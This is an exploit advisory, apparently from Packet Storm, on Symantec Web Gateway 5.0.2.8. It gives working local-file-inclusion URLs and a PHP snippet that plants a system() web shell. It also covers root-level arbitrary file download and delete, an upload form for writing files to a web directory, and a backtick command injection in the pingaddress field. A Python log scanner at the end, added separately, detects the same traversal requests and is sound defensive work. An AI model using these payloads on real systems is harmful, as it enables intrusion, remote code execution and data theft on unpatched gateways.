Symantec Web Gateway 5.0.28 LFI / Code Execution

2012-06-27 00:00:00
S2 Crew
packetstormsecurity.com

Software: Symantec Web Gateway
Current Software Version: 5.0.2.8
Product homepage: www.symantec.com
Author: S2 Crew [Hungary]
CVE: CVE-2012-0297, CVE-2012-0298, ???

File include:
https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd

File include and OS command execution:
http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd
You can execute OS commands by including the error_log:
/usr/local/apache2/logs/
-rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log
-rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log

Make a connection to port 80:
```php
<?php
$f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');
$cmd = "<?php system(\$_GET['cmd']); ?>";
fputs($f,$cmd);
fclose($f);
print "Shell creation done<br>";
?>
```

Arbitrary file download and delete:
https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog
d parameter: the complete filename
After the download process the application removes the original file with root access! :)

Command execution methods:
1. Method
Download and delete the /var/www/html/ciu/.htaccess file.
After that you can access the ciu interface on the web.
There is an upload script: /ciu/uploadFile.php
The user can control the filename and the upload location:
$_FILES['uploadFile'];
$_POST['uploadLocation'];

2. Method
```html
<form action="https://192.168.82.192/ciu/remoteRepairs.php" method="POST" enctype="multipart/form-data">
<input type="file" name="uploadFile">
<input type="text" name="action" value="upload">
<input type="text" name="uploadLocation" value="/var/www/html/spywall/cleaner/">
<input type="hidden" name="configuration" value="test">
<input type="submit" value="upload!">
</form>
```

The "/var/www/html/spywall/cleaner" directory is writable by www-data.

Command execution after authentication:

http://192.168.82.207/spywall/adminConfig.php (this is a deprecated config file; it should be removed)

From the modified POST message:
```
Content-Disposition: form-data; name="pingaddress"

127.0.0.1`whoami>/tmp/1234.txt`
```
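As an added detection example (not part of the advisory or of Symantec's code): a scanner that walks Apache access-log lines and flags the traversal and absolute-path values in the `err`, `relfile` and `d` parameters of the three `spywall` endpoints named above. The log lines are constructed; single and double URL encoding of the traversal are decoded before matching.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint -> parameters taken from the advisory; a traversal or absolute
# path in one of these parameters is the pattern the report describes.
WATCHED = {
    "/spywall/previewproxyerror.php": ("err",),
    "/spywall/releasenotes.php": ("relfile",),
    "/spywall/download_file.php": ("d",),
}

# Combined-log prefix: client, ident, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def suspicious_path(value: str) -> bool:
    """True if the decoded value walks up the tree or names an absolute path."""
    v = unquote(unquote(value)).replace("\\", "/")  # collapse double encoding
    return "../" in v or v.startswith("/")

def scan_line(line: str):
    """Return a finding dict for one log line, or None if it is benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    params = WATCHED.get(unquote(parts.path).lower())
    if not params:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # decodes once
    for name in params:
        for value in qs.get(name, []):
            if suspicious_path(value):
                return {"ip": m.group("ip"), "endpoint": parts.path, "param": name,
                        "value": unquote(unquote(value)), "status": int(m.group("status"))}
    return None

def scan_log(lines):
    return [hit for hit in map(scan_line, lines) if hit]

# Constructed sample lines: two traversal probes, one benign request, one absolute-path download.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Nov/2011:07:21:03 +0000] "GET /spywall/previewProxyError.php?err=../../../../../../../../etc/passwd HTTP/1.1" 200 1881',
    '10.0.0.5 - - [15/Nov/2011:07:22:10 +0000] "GET /spywall/releasenotes.php?relfile=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1881',
    '10.0.0.9 - - [15/Nov/2011:07:23:44 +0000] "GET /spywall/releasenotes.php?relfile=release-5.0.2.8.txt HTTP/1.1" 200 4210',
    '10.0.0.5 - - [15/Nov/2011:07:25:01 +0000] "GET /spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A `200` status on a flagged `err` or `relfile` request is the strongest signal, since the advisory's include returns the file contents inline rather than an error.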